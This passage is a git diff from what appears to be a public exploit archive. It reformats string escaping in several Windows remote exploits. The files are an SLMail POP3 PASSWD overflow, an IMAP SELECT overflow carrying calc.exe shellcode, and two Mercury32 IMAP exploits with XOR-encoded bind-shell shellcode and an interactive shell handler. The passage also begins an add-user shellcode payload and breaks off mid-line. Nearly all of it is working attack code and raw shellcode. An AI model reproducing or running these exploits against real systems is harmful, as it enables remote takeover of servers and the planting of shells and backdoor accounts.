     if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
-        {printf(\"[-] connect() blah!\\n\");
+        {printf("[-] connect() blah!\n");
         exit(0);
           }
-    printf(\"[+] Connected to %s\\n\", host);
+    printf("[+] Connected to %s\n", host);
     return sock;
 }
 
@@ -105,9 +105,9 @@ int main(int argc, char **argv)
 {
     int sock = 0;
     int data, port;
-    printf(\"\\n[$] SLMail Server POP3 PASSWD Buffer Overflow exploit\\n\");
-    printf(\"[$] by Mad Ivan [ void31337 team ] - http://exploit.void31337.ru\\n\\n\");
-    if ( argc < 2 ) { printf(\"usage: slmail-ex.exe <host> \\n\\n\"); exit(0); }
+    printf("\n[$] SLMail Server POP3 PASSWD Buffer Overflow exploit\n");
+    printf("[$] by Mad Ivan [ void31337 team ] - http://exploit.void31337.ru\n\n");
+    if ( argc < 2 ) { printf("usage: slmail-ex.exe <host> \n\n"); exit(0); }
     port = 110;
     sock = connect_target(argv[1], port);
     exploit(sock);
diff --git a/platforms/windows/remote/663.py b/platforms/windows/remote/663.py
index 1dd31098d..ab32052ca 100755
--- a/platforms/windows/remote/663.py
+++ b/platforms/windows/remote/663.py
@@ -18,30 +18,30 @@ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
 # Lame calc.exe shellcode - dont expect miracles!
 
-sc2 = \"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x29\\x81\\x73\\x17\\xb1\\x74\"
-sc2 += \"\\x3f\\x7c\\x83\\xeb\\xfc\\xe2\\xf4\\x4d\\x9c\\x69\\x7c\\xb1\\x74\\x6c\\x29\\xe7\"
-sc2 += \"\\x23\\xb4\\x10\\x95\\x6c\\xb4\\x39\\x8d\\xff\\x6b\\x79\\xc9\\x75\\xd5\\xf7\\xfb\"
-sc2 += \"\\x6c\\xb4\\x26\\x91\\x75\\xd4\\x9f\\x83\\x3d\\xb4\\x48\\x3a\\x75\\xd1\\x4d\\x4e\"
-sc2 += \"\\x88\\x0e\\xbc\\x1d\\x4c\\xdf\\x08\\xb6\\xb5\\xf0\\x71\\xb0\\xb3\\xd4\\x8e\\x8a\"
-sc2 += \"\\x08\\x1b\\x68\\xc4\\x95\\xb4\\x26\\x95\\x75\\xd4\\x1a\\x3a\\x78\\x74\\xf7\\xeb\"
-sc2 += \"\\x68\\x3e\\x97\\x3a\\x70\\xb4\\x7d\\x59\\x9f\\x3d\\x4d\\x71\\x2b\\x61\\x21\\xea\"
-sc2 += \"\\xb6\\x37\\x7c\\xef\\x1e\\x0f\\x25\\xd5\\xff\\x26\\xf7\\xea\\x78\\xb4\\x27\\xad\"
-sc2 += \"\\xff\\x24\\xf7\\xea\\x7c\\x6c\\x14\\x3f\\x3a\\x31\\x90\\x4e\\xa2\\xb6\\xbb\\x5a\"
-sc2 += \"\\x6c\\x6c\\x14\\x29\\x8a\\xb5\\x72\\x4e\\xa2\\xc0\\xac\\xe2\\x1c\\xcf\\xf6\\xb5\"
-sc2 += \"\\x2b\\xc0\\xaa\\xdb\\x74\\xc0\\xac\\x4e\\xa4\\x55\\x7c\\x59\\x95\\xc0\\x83\\x4e\"
-sc2 += \"\\x17\\x5e\\x10\\xd2\\x5a\\x5a\\x04\\xd4\\x74\\x3f\\x7c\"
+sc2 = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x29\x81\x73\x17\xb1\x74"
+sc2 += "\x3f\x7c\x83\xeb\xfc\xe2\xf4\x4d\x9c\x69\x7c\xb1\x74\x6c\x29\xe7"
+sc2 += "\x23\xb4\x10\x95\x6c\xb4\x39\x8d\xff\x6b\x79\xc9\x75\xd5\xf7\xfb"
+sc2 += "\x6c\xb4\x26\x91\x75\xd4\x9f\x83\x3d\xb4\x48\x3a\x75\xd1\x4d\x4e"
+sc2 += "\x88\x0e\xbc\x1d\x4c\xdf\x08\xb6\xb5\xf0\x71\xb0\xb3\xd4\x8e\x8a"
+sc2 += "\x08\x1b\x68\xc4\x95\xb4\x26\x95\x75\xd4\x1a\x3a\x78\x74\xf7\xeb"
+sc2 += "\x68\x3e\x97\x3a\x70\xb4\x7d\x59\x9f\x3d\x4d\x71\x2b\x61\x21\xea"
+sc2 += "\xb6\x37\x7c\xef\x1e\x0f\x25\xd5\xff\x26\xf7\xea\x78\xb4\x27\xad"
+sc2 += "\xff\x24\xf7\xea\x7c\x6c\x14\x3f\x3a\x31\x90\x4e\xa2\xb6\xbb\x5a"
+sc2 += "\x6c\x6c\x14\x29\x8a\xb5\x72\x4e\xa2\xc0\xac\xe2\x1c\xcf\xf6\xb5"
+sc2 += "\x2b\xc0\xaa\xdb\x74\xc0\xac\x4e\xa4\x55\x7c\x59\x95\xc0\x83\x4e"
+sc2 += "\x17\x5e\x10\xd2\x5a\x5a\x04\xd4\x74\x3f\x7c"
 
 #Change RET Address as needed
-buffer = \'\\x41\'*260 +  struct.pack(\'<L\', 0x782f28f7)+ \'\\x90\'*32+sc2
+buffer = '\x41'*260 +  struct.pack('<L', 0x782f28f7)+ '\x90'*32+sc2
 
-print \"\\nSending evil buffer...\"
-s.connect((\'192.168.1.167\',143))
-s.send(\'a001 LOGIN ftp ftp\' + \'\\r\\n\')
+print "\nSending evil buffer..."
+s.connect(('192.168.1.167',143))
+s.send('a001 LOGIN ftp ftp' + '\r\n')
 data = s.recv(1024)
 sleep(3)
-s.send(\'A001 SELECT \' + buffer+\'\\r\\n\')
+s.send('A001 SELECT ' + buffer+'\r\n')
 data = s.recv(1024)
 s.close()
-print \"\\nDone! \"
+print "\nDone! "
 
 # milw0rm.com [2004-11-29]
diff --git a/platforms/windows/remote/668.c b/platforms/windows/remote/668.c
index fca42febd..240519700 100755
--- a/platforms/windows/remote/668.c
+++ b/platforms/windows/remote/668.c
@@ -19,35 +19,35 @@
 #include <fcntl.h>
 #include <sys/time.h>
 
-#define version         \"1.0\"
+#define version         "1.0"
 int usage(char *p);
 
 
 char sc_bind[] =
     //decoder
-    \"\\xEB\\x0F\\x5B\\x80\\x33\\x96\\x43\\x81\\x3B\\x45\\x59\\x34\\x53\\x75\\xF4\\x74\"
-    \"\\x05\\xE8\\xEC\\xFF\\xFF\\xFF\"
+    "\xEB\x0F\x5B\x80\x33\x96\x43\x81\x3B\x45\x59\x34\x53\x75\xF4\x74"
+    "\x05\xE8\xEC\xFF\xFF\xFF"
     //sc_bind_1981 for 2k/xp/2003 v1.03.10.09 by ey4s
     //XOR with 0x96 (267 0x10B bytes)
-    \"\\x7E\\xB2\\x96\\x96\\x96\\x22\\xEB\\x83\\x0E\\x5D\\xD4\\xE1\\x2E\\x4A\\x4B\\x8C\"
-    \"\\xA5\\x7F\\x2D\\x55\\x38\\x50\\xBD\\x2B\\xB8\\x48\\xC1\\xE4\\x32\\xB2\\x24\\xA4\"
-    \"\\x96\\x98\\xCB\\x5D\\x48\\xE2\\xB4\\xF5\\x5E\\xC9\\xFC\\xA6\\xCD\\xF2\\x1D\\x95\"
-    \"\\x1D\\xD6\\x9A\\x1D\\xE6\\x8A\\x3B\\x1D\\xFE\\x9E\\xFC\\x92\\xCF\\x7E\\x12\\x96\"
-    \"\\x96\\x96\\x74\\x6F\\x23\\x95\\xBD\\x77\\xFE\\xA5\\xA4\\x96\\x96\\xFE\\xE1\\xE5\"
-    \"\\xA4\\xC9\\xC2\\x69\\xC1\\x6E\\x03\\xFC\\x93\\xCF\\x7E\\xF1\\x96\\x96\\x96\\x74\"
-    \"\\x6F\\x1D\\x61\\xC7\\xFE\\x94\\x96\\x91\\x2B\\x1D\\x7A\\xC7\\xC7\\xC7\\xC7\\xFC\"
-    \"\\x97\\xFC\\x94\\x69\\xC0\\x66\\x05\\xFC\\x86\\xC3\\xC5\\x69\\xC0\\x62\\xC6\\xC5\"
-    \"\\x69\\xC0\\x6E\\x1D\\x6A\\xFC\\x98\\xCF\\x3D\\x74\\x6B\\xC6\\xC6\\xC5\\x69\\xC0\"
-    \"\\x6A\\x3D\\x3D\\x3D\\xF0\\x51\\xD2\\xB2\\xBA\\x97\\x97\\x1D\\x42\\xFE\\xF5\\xFB\"
-    \"\\xF2\\x96\\x1D\\x5A\\xC5\\xC6\\xC1\\xC4\\xA5\\x4D\\xC5\\xC5\\xC5\\xFC\\x97\\xC5\"
-    \"\\xC5\\xC7\\xC5\\x69\\xC0\\x76\\xFC\\x69\\x69\\xA1\\x69\\xC0\\x4A\\x69\\xC0\\x7A\"
-    \"\\x69\\xC0\\x7A\\x69\\xC0\\x7E\\xC7\\x1D\\xE3\\xAA\\x1D\\xE2\\xB8\\xEE\\x95\\x63\"
-    \"\\xC0\\x1D\\xE0\\xB6\\x95\\x63\\xA5\\x5F\\xDF\\xD7\\x3B\\x95\\x53\\xA5\\x4D\\xA5\"
-    \"\\x44\\x99\\x28\\x86\\xAC\\x40\\xE2\\x9E\\x57\\x5D\\x8D\\x95\\x4C\\xD6\\x7D\\x79\"
-    \"\\xAD\\x89\\xE3\\x73\\xC8\\x1D\\xC8\\xB2\\x95\\x4B\\xF0\\x1D\\x9A\\xDD\\x1D\\xC8\"
-    \"\\x8A\\x95\\x4B\\x1D\\x92\\x1D\\x95\\x53\\x3D\\xCF\\x55\"
+    "\x7E\xB2\x96\x96\x96\x22\xEB\x83\x0E\x5D\xD4\xE1\x2E\x4A\x4B\x8C"
+    "\xA5\x7F\x2D\x55\x38\x50\xBD\x2B\xB8\x48\xC1\xE4\x32\xB2\x24\xA4"
+    "\x96\x98\xCB\x5D\x48\xE2\xB4\xF5\x5E\xC9\xFC\xA6\xCD\xF2\x1D\x95"
+    "\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xFE\x9E\xFC\x92\xCF\x7E\x12\x96"
+    "\x96\x96\x74\x6F\x23\x95\xBD\x77\xFE\xA5\xA4\x96\x96\xFE\xE1\xE5"
+    "\xA4\xC9\xC2\x69\xC1\x6E\x03\xFC\x93\xCF\x7E\xF1\x96\x96\x96\x74"
+    "\x6F\x1D\x61\xC7\xFE\x94\x96\x91\x2B\x1D\x7A\xC7\xC7\xC7\xC7\xFC"
+    "\x97\xFC\x94\x69\xC0\x66\x05\xFC\x86\xC3\xC5\x69\xC0\x62\xC6\xC5"
+    "\x69\xC0\x6E\x1D\x6A\xFC\x98\xCF\x3D\x74\x6B\xC6\xC6\xC5\x69\xC0"
+    "\x6A\x3D\x3D\x3D\xF0\x51\xD2\xB2\xBA\x97\x97\x1D\x42\xFE\xF5\xFB"
+    "\xF2\x96\x1D\x5A\xC5\xC6\xC1\xC4\xA5\x4D\xC5\xC5\xC5\xFC\x97\xC5"
+    "\xC5\xC7\xC5\x69\xC0\x76\xFC\x69\x69\xA1\x69\xC0\x4A\x69\xC0\x7A"
+    "\x69\xC0\x7A\x69\xC0\x7E\xC7\x1D\xE3\xAA\x1D\xE2\xB8\xEE\x95\x63"
+    "\xC0\x1D\xE0\xB6\x95\x63\xA5\x5F\xDF\xD7\x3B\x95\x53\xA5\x4D\xA5"
+    "\x44\x99\x28\x86\xAC\x40\xE2\x9E\x57\x5D\x8D\x95\x4C\xD6\x7D\x79"
+    "\xAD\x89\xE3\x73\xC8\x1D\xC8\xB2\x95\x4B\xF0\x1D\x9A\xDD\x1D\xC8"
+    "\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x3D\xCF\x55"
     //decoder end sign
-    \"\\x45\\x59\\x34\\x53\";
+    "\x45\x59\x34\x53";
 
 int             iType;
 int             iPort=143;
@@ -67,21 +67,21 @@ int main(int argc, char **argv)
     }
 
 
-    while((c = getopt(argc, argv, \"u:P:h:p:\")) != EOF) {
+    while((c = getopt(argc, argv, "u:P:h:p:")) != EOF) {
         switch(c) {
 
-        case \'u\':
+        case 'u':
             strncpy(username, optarg, sizeof (username) - 1);
             break;
 
-        case \'P\':
+        case 'P':
             strncpy(password, optarg, sizeof (password) - 1);
             break;
 
-        case \'h\':
+        case 'h':
             ip=optarg;
             break;
-        case \'p\':
+        case 'p':
             iPort=atoi(optarg);
             break;
         default:
@@ -94,7 +94,7 @@ int main(int argc, char **argv)
     if((!ip))
     {
         usage(argv[0]);
-        printf(\"[-] Invalid parameter.\\n\");
+        printf("[-] Invalid parameter.\n");
         return 0;
     }
 
@@ -117,7 +117,7 @@ void shell (int sock)
         if (FD_ISSET (0, &rfds)) {
             l = read (0, buf, sizeof (buf));
             if (l <= 0) {
-                printf(\"\\n - Connection closed by local user\\n\");
+                printf("\n - Connection closed by local user\n");
                 exit (EXIT_FAILURE);
             }
             write (sock, buf, l);
@@ -126,10 +126,10 @@ void shell (int sock)
         if (FD_ISSET (sock, &rfds)) {
             l = read (sock, buf, sizeof (buf));
             if (l == 0) {
-                printf (\"\\n - Connection closed by remote host.\\n\");
+                printf ("\n - Connection closed by remote host.\n");
                 exit (EXIT_FAILURE);
             } else if (l < 0) {
-                printf (\"\\n - Read failure\\n\");
+                printf ("\n - Read failure\n");
                 exit (EXIT_FAILURE);
             }
             write (1, buf, l);
@@ -149,20 +149,20 @@ int     SendExploit()
     char    szRecvBuff[0x1000];
     char *ip2=NULL;
 
-    printf( \"MERCURY32 Imap exploit\\n\");
-    printf( \"By: JohnH@secnetops.com\\n\");
-    printf(\"[+] Entering God Mode\\n\");
+    printf( "MERCURY32 Imap exploit\n");
+    printf( "By: JohnH@secnetops.com\n");
+    printf("[+] Entering God Mode\n");
 
     // Login
     memset(buffer2,0x0,sizeof(buffer2));
-    strcat(buffer2,\"a001 LOGIN \");
+    strcat(buffer2,"a001 LOGIN ");
     strcat(buffer2,username);
-    strcat(buffer2,\" \");
+    strcat(buffer2," ");
     strcat(buffer2,password);
-    strcat(buffer2,\"\\n\");
+    strcat(buffer2,"\n");
 
     bzero  (buffer,sizeof(buffer));
-    strcat(buffer,\"a001 SELECT \");
+    strcat(buffer,"a001 SELECT ");
     x = strlen(buffer);
     memset(buffer+x,0x41,260);
     x+=260;
@@ -172,13 +172,13 @@ int     SendExploit()
     x+=100;
     memcpy (buffer+x, sc_bind, strlen(sc_bind));
     x+=strlen(sc_bind);
-    memcpy(buffer+x,\"\\r\\n\",2);
+    memcpy(buffer+x,"\r\n",2);
     x+=2;
 
 
     if (!(he = gethostbyname(ip)))
     {
-        herror(\"Resolving host\");
+        herror("Resolving host");
         exit(EXIT_FAILURE);
     }
     in.s_addr = *((unsigned int *)he->h_addr);
@@ -188,30 +188,30 @@ int     SendExploit()
     s = socket(AF_INET, SOCK_STREAM, 0);
     if (s < 0)
     {
-        perror(\"socket\");
+        perror("socket");
         return(0);
     }
     if (connect(s, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0)
 
     {
-        perror(\"connect\");
+        perror("connect");
         return(0);
     }
-    printf(\"[+] connect to %s:%d success.\\n\", ip, iPort);
+    printf("[+] connect to %s:%d success.\n", ip, iPort);
     sleep(3);
 
     memset(szRecvBuff, 0, sizeof(szRecvBuff));
     iErr = send(s, buffer2, strlen(buffer2),0);
-    printf(\"[+] Sent: %d\\n\", iErr);
+    printf("[+] Sent: %d\n", iErr);
 
     iErr = send(s, buffer, x,0);
 
-    printf(\"[+] Sent: %d\\n\", iErr);
+    printf("[+] Sent: %d\n", iErr);
 
-    printf(\"[+] Wait for shell.\\n\");
+    printf("[+] Wait for shell.\n");
     if (!(he = gethostbyname(ip)))
     {
-        herror(\"Resolving host\");
+        herror("Resolving host");
         exit(EXIT_FAILURE);
     }
     in.s_addr = *((unsigned int *)he->h_addr);
@@ -224,16 +224,16 @@ int     SendExploit()
     s2 = socket(AF_INET, SOCK_STREAM, 0);
     if (s2 < 0)
     {
-        perror(\"socket\");
+        perror("socket");
         exit(EXIT_FAILURE);
     }
 
     if (connect(s2, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0)
     {
-        perror(\"connect\");
+        perror("connect");
         return(0);
     }
-    printf (\"[+] We got a shell \\n\");
+    printf ("[+] We got a shell \n");
 
     shell(s2);
 
@@ -244,9 +244,9 @@ int     SendExploit()
 
 int usage(char *p)
 {
-    printf(\"MERCURY32 Imap Remote Exploit\\n\");
-    printf(\"By: JohnH@secnetops.com\\n\");
-    printf( \"Usage: %s <-u username> <-p password> <-h host> <-p port>\\n\",p);
+    printf("MERCURY32 Imap Remote Exploit\n");
+    printf("By: JohnH@secnetops.com\n");
+    printf( "Usage: %s <-u username> <-p password> <-h host> <-p port>\n",p);
     exit(0);
 }
 
diff --git a/platforms/windows/remote/670.c b/platforms/windows/remote/670.c
index 77fdf18ff..e046dd9f4 100755
--- a/platforms/windows/remote/670.c
+++ b/platforms/windows/remote/670.c
@@ -24,35 +24,35 @@
 #include <fcntl.h>
 #include <sys/time.h>
 
-#define version         \"1.0\"
+#define version         "1.0"
 int usage(char *p);
 
 
 char sc_bind[] =
     //decoder
-    \"\\xEB\\x0F\\x5B\\x80\\x33\\x96\\x43\\x81\\x3B\\x45\\x59\\x34\\x53\\x75\\xF4\\x74\"
-    \"\\x05\\xE8\\xEC\\xFF\\xFF\\xFF\"
+    "\xEB\x0F\x5B\x80\x33\x96\x43\x81\x3B\x45\x59\x34\x53\x75\xF4\x74"
+    "\x05\xE8\xEC\xFF\xFF\xFF"
     //sc_bind_1981 for 2k/xp/2003 v1.03.10.09 by ey4s
     //XOR with 0x96 (267 0x10B bytes)
-    \"\\x7E\\xB2\\x96\\x96\\x96\\x22\\xEB\\x83\\x0E\\x5D\\xD4\\xE1\\x2E\\x4A\\x4B\\x8C\"
-    \"\\xA5\\x7F\\x2D\\x55\\x38\\x50\\xBD\\x2B\\xB8\\x48\\xC1\\xE4\\x32\\xB2\\x24\\xA4\"
-    \"\\x96\\x98\\xCB\\x5D\\x48\\xE2\\xB4\\xF5\\x5E\\xC9\\xFC\\xA6\\xCD\\xF2\\x1D\\x95\"
-    \"\\x1D\\xD6\\x9A\\x1D\\xE6\\x8A\\x3B\\x1D\\xFE\\x9E\\xFC\\x92\\xCF\\x7E\\x12\\x96\"
-    \"\\x96\\x96\\x74\\x6F\\x23\\x95\\xBD\\x77\\xFE\\xA5\\xA4\\x96\\x96\\xFE\\xE1\\xE5\"
-    \"\\xA4\\xC9\\xC2\\x69\\xC1\\x6E\\x03\\xFC\\x93\\xCF\\x7E\\xF1\\x96\\x96\\x96\\x74\"
-    \"\\x6F\\x1D\\x61\\xC7\\xFE\\x94\\x96\\x91\\x2B\\x1D\\x7A\\xC7\\xC7\\xC7\\xC7\\xFC\"
-    \"\\x97\\xFC\\x94\\x69\\xC0\\x66\\x05\\xFC\\x86\\xC3\\xC5\\x69\\xC0\\x62\\xC6\\xC5\"
-    \"\\x69\\xC0\\x6E\\x1D\\x6A\\xFC\\x98\\xCF\\x3D\\x74\\x6B\\xC6\\xC6\\xC5\\x69\\xC0\"
-    \"\\x6A\\x3D\\x3D\\x3D\\xF0\\x51\\xD2\\xB2\\xBA\\x97\\x97\\x1D\\x42\\xFE\\xF5\\xFB\"
-    \"\\xF2\\x96\\x1D\\x5A\\xC5\\xC6\\xC1\\xC4\\xA5\\x4D\\xC5\\xC5\\xC5\\xFC\\x97\\xC5\"
-    \"\\xC5\\xC7\\xC5\\x69\\xC0\\x76\\xFC\\x69\\x69\\xA1\\x69\\xC0\\x4A\\x69\\xC0\\x7A\"
-    \"\\x69\\xC0\\x7A\\x69\\xC0\\x7E\\xC7\\x1D\\xE3\\xAA\\x1D\\xE2\\xB8\\xEE\\x95\\x63\"
-    \"\\xC0\\x1D\\xE0\\xB6\\x95\\x63\\xA5\\x5F\\xDF\\xD7\\x3B\\x95\\x53\\xA5\\x4D\\xA5\"
-    \"\\x44\\x99\\x28\\x86\\xAC\\x40\\xE2\\x9E\\x57\\x5D\\x8D\\x95\\x4C\\xD6\\x7D\\x79\"
-    \"\\xAD\\x89\\xE3\\x73\\xC8\\x1D\\xC8\\xB2\\x95\\x4B\\xF0\\x1D\\x9A\\xDD\\x1D\\xC8\"
-    \"\\x8A\\x95\\x4B\\x1D\\x92\\x1D\\x95\\x53\\x3D\\xCF\\x55\"
+    "\x7E\xB2\x96\x96\x96\x22\xEB\x83\x0E\x5D\xD4\xE1\x2E\x4A\x4B\x8C"
+    "\xA5\x7F\x2D\x55\x38\x50\xBD\x2B\xB8\x48\xC1\xE4\x32\xB2\x24\xA4"
+    "\x96\x98\xCB\x5D\x48\xE2\xB4\xF5\x5E\xC9\xFC\xA6\xCD\xF2\x1D\x95"
+    "\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xFE\x9E\xFC\x92\xCF\x7E\x12\x96"
+    "\x96\x96\x74\x6F\x23\x95\xBD\x77\xFE\xA5\xA4\x96\x96\xFE\xE1\xE5"
+    "\xA4\xC9\xC2\x69\xC1\x6E\x03\xFC\x93\xCF\x7E\xF1\x96\x96\x96\x74"
+    "\x6F\x1D\x61\xC7\xFE\x94\x96\x91\x2B\x1D\x7A\xC7\xC7\xC7\xC7\xFC"
+    "\x97\xFC\x94\x69\xC0\x66\x05\xFC\x86\xC3\xC5\x69\xC0\x62\xC6\xC5"
+    "\x69\xC0\x6E\x1D\x6A\xFC\x98\xCF\x3D\x74\x6B\xC6\xC6\xC5\x69\xC0"
+    "\x6A\x3D\x3D\x3D\xF0\x51\xD2\xB2\xBA\x97\x97\x1D\x42\xFE\xF5\xFB"
+    "\xF2\x96\x1D\x5A\xC5\xC6\xC1\xC4\xA5\x4D\xC5\xC5\xC5\xFC\x97\xC5"
+    "\xC5\xC7\xC5\x69\xC0\x76\xFC\x69\x69\xA1\x69\xC0\x4A\x69\xC0\x7A"
+    "\x69\xC0\x7A\x69\xC0\x7E\xC7\x1D\xE3\xAA\x1D\xE2\xB8\xEE\x95\x63"
+    "\xC0\x1D\xE0\xB6\x95\x63\xA5\x5F\xDF\xD7\x3B\x95\x53\xA5\x4D\xA5"
+    "\x44\x99\x28\x86\xAC\x40\xE2\x9E\x57\x5D\x8D\x95\x4C\xD6\x7D\x79"
+    "\xAD\x89\xE3\x73\xC8\x1D\xC8\xB2\x95\x4B\xF0\x1D\x9A\xDD\x1D\xC8"
+    "\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x3D\xCF\x55"
     //decoder end sign
-    \"\\x45\\x59\\x34\\x53\";
+    "\x45\x59\x34\x53";
 
 int             type;
 int             iPort=143;
@@ -72,24 +72,24 @@ int main(int argc, char **argv)
     }
 
 
-    while((c = getopt(argc, argv, \"u:P:h:p:t:\")) != EOF) {
+    while((c = getopt(argc, argv, "u:P:h:p:t:")) != EOF) {
         switch(c) {
 
-        case \'u\':
+        case 'u':
             strncpy(username, optarg, sizeof (username) - 1);
             break;
 
-        case \'P\':
+        case 'P':
             strncpy(password, optarg, sizeof (password) - 1);
             break;
 
-        case \'h\':
+        case 'h':
             ip=optarg;
             break;
-        case \'p\':
+        case 'p':
             iPort=atoi(optarg);
             break;
-        case \'t\':
+        case 't':
 	    type=atoi(optarg);
 	    break;
 	default:
@@ -102,7 +102,7 @@ int main(int argc, char **argv)
     if((!ip))
     {
         usage(argv[0]);
-        printf(\"[-] Invalid parameter.\\n\");
+        printf("[-] Invalid parameter.\n");
         return 0;
     }
 
@@ -125,7 +125,7 @@ void shell (int sock)
         if (FD_ISSET (0, &rfds)) {
             l = read (0, buf, sizeof (buf));
             if (l <= 0) {
-                printf(\"\\n - Connection closed by local user\\n\");
+                printf("\n - Connection closed by local user\n");
                 exit (EXIT_FAILURE);
             }
             write (sock, buf, l);
@@ -134,10 +134,10 @@ void shell (int sock)
         if (FD_ISSET (sock, &rfds)) {
             l = read (sock, buf, sizeof (buf));
             if (l == 0) {
-                printf (\"\\n - Connection closed by remote host.\\n\");
+                printf ("\n - Connection closed by remote host.\n");
                 exit (EXIT_FAILURE);
             } else if (l < 0) {
-                printf (\"\\n - Read failure\\n\");
+                printf ("\n - Read failure\n");
                 exit (EXIT_FAILURE);
             }
             write (1, buf, l);
@@ -157,50 +157,50 @@ int     SendExploit()
     char    szRecvBuff[0x1000];
     char *ip2=NULL;
 
-    printf( \"MERCURY32 Imap exploit\\n\");
-    printf( \"By: JohnH@secnetops.com\\n\");
-    printf(\"[+] Entering God Mode\\n\");
+    printf( "MERCURY32 Imap exploit\n");
+    printf( "By: JohnH@secnetops.com\n");
+    printf("[+] Entering God Mode\n");
 
     // Login
     memset(buffer2,0x0,sizeof(buffer2));
-    strcat(buffer2,\"a001 LOGIN \");
+    strcat(buffer2,"a001 LOGIN ");
     strcat(buffer2,username);
-    strcat(buffer2,\" \");
+    strcat(buffer2," ");
     strcat(buffer2,password);
-    strcat(buffer2,\"\\n\");
+    strcat(buffer2,"\n");
 
     bzero  (buffer,sizeof(buffer));
-    printf(\"[+] Using type: %d\\n\",type);
+    printf("[+] Using type: %d\n",type);
     if (type == 0)
-          strcat(buffer,\"a001 EXAMINE \");
+          strcat(buffer,"a001 EXAMINE ");
     else if(type == 1)
-	   strcat(buffer,\"a001 SUBSCRIBE \");
+	   strcat(buffer,"a001 SUBSCRIBE ");
     else if(type == 2)
-	   strcat(buffer,\"a001 STATUS \");
+	   strcat(buffer,"a001 STATUS ");
     else if(type == 3)
-            strcat(buffer,\"a001 APPEND \");
+            strcat(buffer,"a001 APPEND ");
     else if(type == 4)
-            strcat(buffer,\"a001 CHECK \");
+            strcat(buffer,"a001 CHECK ");
     else if(type == 5)
-            strcat(buffer,\"a001 CLOSE \");
+            strcat(buffer,"a001 CLOSE ");
     else if(type == 6)
-            strcat(buffer,\"a001 EXPUNGE \");
+            strcat(buffer,"a001 EXPUNGE ");
     else if(type == 7)
-            strcat(buffer,\"a001 FETCH \");
+            strcat(buffer,"a001 FETCH ");
     else if(type == 8)
-            strcat(buffer,\"a001 RENAME \");
+            strcat(buffer,"a001 RENAME ");
     else if(type == 9)
-            strcat(buffer,\"a001 DELETE \");
+            strcat(buffer,"a001 DELETE ");
     else if(type == 10)
-            strcat(buffer,\"a001 LIST \");
+            strcat(buffer,"a001 LIST ");
     else if(type == 11)
-            strcat(buffer,\"a001 SEARCH \");
+            strcat(buffer,"a001 SEARCH ");
     else if(type == 12)
-	    strcat(buffer,\"a001 CREATE \");
+	    strcat(buffer,"a001 CREATE ");
     else if(type == 13)
-            strcat(buffer,\"a001 UNSUBSCRIBE \");
+            strcat(buffer,"a001 UNSUBSCRIBE ");
     else if(type == 14)
-	    strcat(buffer,\"a001 SELECT \");
+	    strcat(buffer,"a001 SELECT ");
 
 
 
@@ -213,13 +213,13 @@ int     SendExploit()
     x+=100;
     memcpy (buffer+x, sc_bind, strlen(sc_bind));
     x+=strlen(sc_bind);
-    memcpy(buffer+x,\"\\r\\n\",2);
+    memcpy(buffer+x,"\r\n",2);
     x+=2;
 
 
     if (!(he = gethostbyname(ip)))
     {
-        herror(\"Resolving host\");
+        herror("Resolving host");
         exit(EXIT_FAILURE);
     }
     in.s_addr = *((unsigned int *)he->h_addr);
@@ -229,30 +229,30 @@ int     SendExploit()
     s = socket(AF_INET, SOCK_STREAM, 0);
     if (s < 0)
     {
-        perror(\"socket\");
+        perror("socket");
         return(0);
     }
     if (connect(s, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0)
 
     {
-        perror(\"connect\");
+        perror("connect");
         return(0);
     }
-    printf(\"[+] connect to %s:%d success.\\n\", ip, iPort);
+    printf("[+] connect to %s:%d success.\n", ip, iPort);
     sleep(3);
 
     memset(szRecvBuff, 0, sizeof(szRecvBuff));
     iErr = send(s, buffer2, strlen(buffer2),0);
-    printf(\"[+] Sent: %d\\n\", iErr);
+    printf("[+] Sent: %d\n", iErr);
 
     iErr = send(s, buffer, x,0);
 
-    printf(\"[+] Sent: %d\\n\", iErr);
+    printf("[+] Sent: %d\n", iErr);
 
-    printf(\"[+] Wait for shell.\\n\");
+    printf("[+] Wait for shell.\n");
     if (!(he = gethostbyname(ip)))
     {
-        herror(\"Resolving host\");
+        herror("Resolving host");
         exit(EXIT_FAILURE);
     }
     in.s_addr = *((unsigned int *)he->h_addr);
@@ -265,16 +265,16 @@ int     SendExploit()
     s2 = socket(AF_INET, SOCK_STREAM, 0);
     if (s2 < 0)
     {
-        perror(\"socket\");
+        perror("socket");
         exit(EXIT_FAILURE);
     }
 
     if (connect(s2, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0)
     {
-        perror(\"connect\");
+        perror("connect");
         return(0);
     }
-    printf (\"[+] We got a shell \\n\");
+    printf ("[+] We got a shell \n");
 
     shell(s2);
 
@@ -285,10 +285,10 @@ int     SendExploit()
 
 int usage(char *p)
 {
-    printf(\"MERCURY32 Imap Remote Exploit\\n\");
-    printf(\"By: JohnH@secnetops.com\\n\");
-    printf( \"Usage: %s <-u username> <-p password> <-h host> <-p port> <-t type>\\n\",p);
-    printf(\"Possible types: Look in source code too lazy to type out 14 types\\n\");
+    printf("MERCURY32 Imap Remote Exploit\n");
+    printf("By: JohnH@secnetops.com\n");
+    printf( "Usage: %s <-u username> <-p password> <-h host> <-p port> <-t type>\n",p);
+    printf("Possible types: Look in source code too lazy to type out 14 types\n");
     exit(0);
 }
 
diff --git a/platforms/windows/remote/819.py b/platforms/windows/remote/819.py
index 4abf7df37..8f6cbead9 100755
--- a/platforms/windows/remote/819.py
+++ b/platforms/windows/remote/819.py
@@ -9,38 +9,38 @@
 #########################################################
 import struct
 import socket
-sc = \"\\x90\" * 21	#We need this number of nops
+sc = "\x90" * 21	#We need this number of nops
 # win32_adduser - PASS=pwd EXITFUNC=thread USER=X Size=232 Encoder=PexFnstenvSub http://metasploit.com
-sc += \"\\x31\\xc9\\x83\\xe9\\xcc\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xd8\"
